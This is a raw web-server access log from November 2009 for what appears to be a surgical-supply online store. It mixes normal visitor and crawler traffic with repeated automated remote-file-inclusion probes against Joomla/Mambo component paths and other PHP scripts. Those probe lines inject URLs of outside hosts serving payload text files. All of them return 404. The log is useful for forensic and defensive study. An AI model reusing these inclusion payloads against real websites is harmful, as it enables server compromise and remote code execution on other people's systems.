64.191.166.24 - - [26/Nov/2009:01:39:20 -0500] "GET /logs/access_log.Q109051200%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
64.191.166.24 - - [26/Nov/2009:01:39:25 -0500] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
125.245.165.135 - - [26/Nov/2009:01:42:00 -0500] "GET /logs/error_log.Q109081300//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dhszgh.org/eBook.pdf?? HTTP/1.1" 404 268 "-" "Advanced Browser (http://www.avantbrowser.com)"
82.195.252.206 - - [26/Nov/2009:01:42:28 -0500] "GET /logs/access_log.Q109051200%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:01:42:48 -0500] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:01:43:22 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.150.177.236 - - [26/Nov/2009:01:43:29 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
64.150.177.236 - - [26/Nov/2009:01:43:29 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://209.250.240.98/~f2f/idv6.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
89.108.91.144 - - [26/Nov/2009:01:43:54 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:01:43:54 -0500] "GET /logs/access_log.Q109051200//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:01:43:54 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.191.166.24 - - [26/Nov/2009:01:44:20 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.191.166.24 - - [26/Nov/2009:01:44:20 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:01:44:52 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:01:44:52 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:01:45:01 -0500] "GET /logs/access_log.Q109051200%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:01:45:05 -0500] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
95.110.225.160 - - [26/Nov/2009:01:47:29 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ubuntu123.fileave.com/test.txt? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
95.110.225.160 - - [26/Nov/2009:01:47:31 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://ubuntu123.fileave.com/test.txt? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
67.195.111.169 - - [26/Nov/2009:01:47:29 -0500] "GET /logs/access_log.Q109110700 HTTP/1.0" 200 2632711 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [26/Nov/2009:01:48:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.111.169 - - [26/Nov/2009:01:48:29 -0500] "GET /scripts/mydata.js HTTP/1.0" 200 5585 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.191.166.24 - - [26/Nov/2009:01:48:46 -0500] "GET /logs/access_log.Q109051500//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:01:49:25 -0500] "GET /logs/access_log.Q109051500//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:01:51:12 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.108.91.144 - - [26/Nov/2009:01:51:12 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:01:53:23 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.91.144 - - [26/Nov/2009:01:54:26 -0500] "GET /logs/access_log.Q109051500//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
98.198.233.247 - - [26/Nov/2009:01:55:31 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:55:31 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:55:32 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:55:32 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:55:58 -0500] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01 HTTP/1.1" 200 54808 "http://www.acesurgical.com/expand_chisel.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:55:59 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:55:59 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:55:59 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:55:59 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:55:59 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:00 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:00 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:00 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:00 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:00 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:00 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:00 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:00 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/items/4544700_THUMB.JPG HTTP/1.1" 200 3000 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:01 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
64.191.166.24 - - [26/Nov/2009:01:56:20 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.191.166.24 - - [26/Nov/2009:01:56:20 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
64.191.166.24 - - [26/Nov/2009:01:56:20 -0500] "GET /logs/access_log.Q109051500/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
98.198.233.247 - - [26/Nov/2009:01:56:22 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143B35D8021B000E7BC08B+M37+ENG HTTP/1.1" 200 76947 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:25 -0500] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143B35D8021B000E7BC08B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:25 -0500] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143B35D8021B000E7BC08B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:25 -0500] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143B35D8021B000E7BC08B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:25 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
98.198.233.247 - - [26/Nov/2009:01:56:37 -0500] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1143B35D8021B000E7BC08B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
67.195.114.54 - - [26/Nov/2009:01:56:16 -0500] "GET /logs/access_log.Q109110800 HTTP/1.0" 200 3098198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.195.252.206 - - [26/Nov/2009:01:57:14 -0500] "GET /logs/access_log.Q109051500/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:01:57:14 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:01:57:14 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
